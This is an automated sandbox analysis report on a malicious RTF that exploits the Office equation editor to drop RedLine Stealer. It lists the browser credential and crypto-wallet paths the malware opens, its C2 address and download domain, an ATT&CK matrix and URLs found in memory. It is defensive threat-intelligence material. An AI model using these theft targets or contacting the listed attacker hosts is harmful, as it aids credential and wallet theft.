                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: notorious53209.exeBinary or memory string: WIN_81
                    Source: notorious53209.exeBinary or memory string: WIN_XP
                    Source: notorious53209.exeBinary or memory string: WIN_XPe
                    Source: notorious53209.exeBinary or memory string: WIN_VISTA
                    Source: notorious53209.exeBinary or memory string: WIN_7
                    Source: notorious53209.exeBinary or memory string: WIN_8
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_008F6596
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_008F6A5A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information2
                    Scripting                    		2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		2
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		13
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts33
                    Exploitation for Client Execution                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		11
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Windows Service                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS228
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Windows Service                    		1
                    DLL Side-Loading                    		LSA Secrets45
                    Security Software Discovery                    		SSHKeylogging114
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
                    Process Injection                    		1
                    Masquerading                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network Sniffing1
                    Remote System Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1461862 Sample: 2MbHBiqXH2.rtf Startdate: 24/06/2024 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 16 other signatures 2->48 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 32 universalmovies.top 172.67.162.95, 443, 49162 CLOUDFLARENETUS United States 10->32 24 C:\Users\user\AppData\...\notorious53209.exe, PE32 10->24 dropped 26 C:\Users\user\AppData\...xtExport2[1].exe, PE32 10->26 dropped 58 Office equation editor establishes network connection 10->58 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->60 17 notorious53209.exe 4 10->17         started        file6 signatures7 process8 signatures9 34 Multi AV Scanner detection for dropped file 17->34 36 Binary is likely a compiled AutoIt script file 17->36 38 Found many strings related to Crypto-Wallets (likely being stolen) 17->38 40 3 other signatures 17->40 20 RegSvcs.exe 13 34 17->20         started        process10 dnsIp11 28 185.38.142.10, 49163, 49165, 7474 NETSOLUTIONSNL Portugal 20->28 30 api.ip.sb 20->30 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Found many strings related to Crypto-Wallets (likely being stolen) 20->52 54 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->54 56 2 other signatures 20->56 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    2MbHBiqXH2.rtf37%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe50%ReversingLabsWin32.Trojan.Strab
                    C:\Users\user\AppData\Roaming\notorious53209.exe50%ReversingLabsWin32.Trojan.Strab

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ocsp.entrust.net030%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://ns.adobe.c/s0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/fault0%Avira URL Cloudsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    https://support.google.com/chrome/?p=plugin_flashLR0%Avira URL Cloudsafe
                    https://support.LR0%Avira URL Cloudsafe
                    https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                    http://185.38.142.10:74740%Avira URL Cloudsafe
                    185.38.142.10:74740%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                    http://tempuri.org/x0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                    https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                    http://185.38.142.10:7474/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                    http://ns.adobede0%Avira URL Cloudsafe
                    https://universalmovies.top/100%Avira URL Cloudphishing
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                    https://api.ipify.0%Avira URL Cloudsafe
                    https://universalmovies.top/(100%Avira URL Cloudphishing
                    https://api.ipify.orgcoo0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    universalmovies.top
                    		172.67.162.95
                    		truetrue
                      		unknown
                      api.ip.sb
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        185.38.142.10:7474true
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.38.142.10:7474/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ns.adobe.c/sRegSvcs.exe, 00000006.00000002.387739574.00000000008E7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ip.sb/geoipRegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashRegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002429000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ipify.orgcookies//settinString.RemovegRegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashLRRegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.LRRegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ipinfo.io/ip%appdata%RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.38.142.10:7474RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/xRegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ip.sbRegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/favicon.icotmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ns.adobedeRegSvcs.exe, 00000006.00000002.388337952.0000000004F2D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://universalmovies.top/EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://universalmovies.top/(EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ipify.RegSvcs.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
